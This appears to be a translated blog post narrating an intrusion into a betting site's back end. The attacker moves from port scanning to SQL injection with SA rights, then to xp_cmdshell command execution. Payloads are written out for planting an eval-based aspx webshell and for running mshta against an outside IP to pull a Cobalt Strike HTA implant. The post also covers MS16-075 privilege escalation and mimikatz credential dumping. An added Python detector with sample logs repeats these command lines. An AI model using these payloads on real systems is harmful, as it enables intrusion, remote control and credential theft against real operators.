A betting site test

All I was given was a back-end site, so the first step was information gathering: look it up on the cyberspace search engine FOFA, then port-scan and pick out the ports worth looking at: 80, 81, 1433, 3389.
Vulnerable endpoint: http://49.xxx.xx.xxx:81/Login/index
SQL injection in the POST request (the response headers show ASP.NET on Microsoft-IIS/7.5)
Database privileges: SA
Having found the injection, I wanted to get into the admin backend to have a look, so I spent a while on a Python script (forgive me, I am a newbie).
I got the password and entered the backend. The template is a standard one: there is no data backup, no template editing, uploads are checked against a whitelist, an editor is present but its sample code has been deleted, and the message board does not accept messages. Going back to the injection: since it is stacked injection, SQL statements can be executed, so I tried a few... but there was no response. The code is as follows:

I thought it was over at that point, but unexpectedly the login on port 3389 failed and the connection to port 1433 also failed, which left me quite confused. After some guidance from a more experienced tester: stacked injection gives no echo, so at this point you can ping a dnslog address. Fortunately I had set one up a few days ago. Since dnslog received a request, that proves the xp_cmdshell extended stored procedure is enabled and commands can be executed. There are two ideas from here. The first is to execute a cmd command and write its output into the website root directory:
';exec master…xp_cmdshell'echo ^<%@ Page Language="Jscript"% > <%eval(Request.Item["pass"],"unsafe");%^ >> c:\website path\shell.aspx';-
I used the second method because I could not get the absolute path of the website.

The second is to download and run the Trojan so that the host goes straight online in CS: set up a listener in Cobalt Strike, generate an HTML Application file, and host it on the CS server.
Execute at the injection point:
'; exec master.dbo.xp_cmdshell'mshta http://39.xx .xxx.xxx:80/download/file.ext';-
After a moment the host comes online.
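As an added example (not part of the original post), here is a small Python detector for the trace this chain leaves in SQL Server audit records: a stacked query followed by xp_cmdshell, an outbound dnslog ping, an mshta download, or output redirected into an .aspx file. The audit records, their "timestamp|login|client|statement" layout and the indicator patterns are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample of SQL Server audit records, simplified to
# "timestamp|login|client_ip|statement"; made up for this example.
SAMPLE_AUDIT = r"""
2020-06-04 10:21:07|sa|10.0.0.25|SELECT id,pwd FROM admin WHERE name='admin'
2020-06-04 10:21:09|sa|10.0.0.25|SELECT id FROM admin WHERE name='x';exec master..xp_cmdshell 'ping abc.dnslog.cn';--'
2020-06-04 10:21:30|sa|10.0.0.25|SELECT id FROM admin WHERE name='x'; EXEC master.dbo.XP_CMDSHELL 'mshta http://39.xx.xxx.xxx/download/file.ext';--'
2020-06-04 10:21:41|webapp|10.0.0.25|SELECT id FROM admin WHERE name='x';exec/**/master..xp_cmdshell 'echo test >> C:\inetpub\wwwroot\test.aspx';--'
2020-06-04 10:22:00|reporting|10.0.0.30|SELECT COUNT(*) FROM bets WHERE placed_at > '2020-06-01'
"""

# Indicators of the chain described above, matched against normalised text.
INDICATORS = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "mshta_download": re.compile(r"\bmshta\s+https?://"),
    "dns_callback": re.compile(r"\b(ping|nslookup)\s+\S*dnslog\S*"),  # heuristic
    "webshell_write": re.compile(r">>?\s*\S+\.(aspx?|ashx)\b"),
}
STACKED = re.compile(r";\s*(exec|execute)\b")

@dataclass
class Finding:
    timestamp: str
    login: str
    client: str
    stacked: bool
    indicators: list
    severity: str

def normalise(sql: str) -> str:
    """Lower-case, drop block comments and collapse whitespace so obfuscated
    variants such as exec/**/master..XP_CMDSHELL still match."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"\s+", " ", sql).strip().lower()

def analyse(record: str):
    """Return a Finding for one audit record, or None if it looks benign."""
    timestamp, login, client, statement = record.split("|", 3)
    norm = normalise(statement)
    hits = [name for name, pat in INDICATORS.items() if pat.search(norm)]
    stacked = STACKED.search(norm) is not None
    if not hits and not stacked:
        return None
    # Command execution under the sa login is the worst case: no escalation needed.
    severity = "critical" if hits and login.lower() == "sa" else "high" if hits else "medium"
    return Finding(timestamp, login, client, stacked, hits, severity)

def scan(audit_text: str) -> list:
    return [f for f in map(analyse, filter(None, audit_text.splitlines())) if f]
```

Run `scan(SAMPLE_AUDIT)` to see three findings; the first two are critical because the web application connects as sa, which is the configuration that turned an injection into command execution here.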
Set the beacon check-in interval; the host is not domain-joined.
More than 200 patches are installed. Comparing the hotfix list from systeminfo against known vulnerabilities to see whether any had been missed turned up an exploitable one: MS16-075.
systeminfo | findstr KB3164038
The CNA plug-in for the exploit on GitHub (https://github.com/vysecurity/reflectivepotato.git) is loaded into the Script Manager.
Here one should not directly create an administrator account; instead use mimikatz to read the hashes, or SSP, to obtain the plaintext password. That concludes the test.

Source: blog.csdn.net/weixin_45682070/article/details/106551790